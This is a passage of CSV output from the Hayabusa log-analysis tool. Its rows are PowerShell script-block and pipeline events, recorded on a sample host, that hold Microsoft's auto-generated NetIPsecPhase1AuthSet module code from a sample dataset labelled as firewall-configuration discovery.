${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.926 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecPhase1AuthSet ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase1AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase1AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase1AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase1AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase1AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase1AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletizati",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"on_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.942 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, 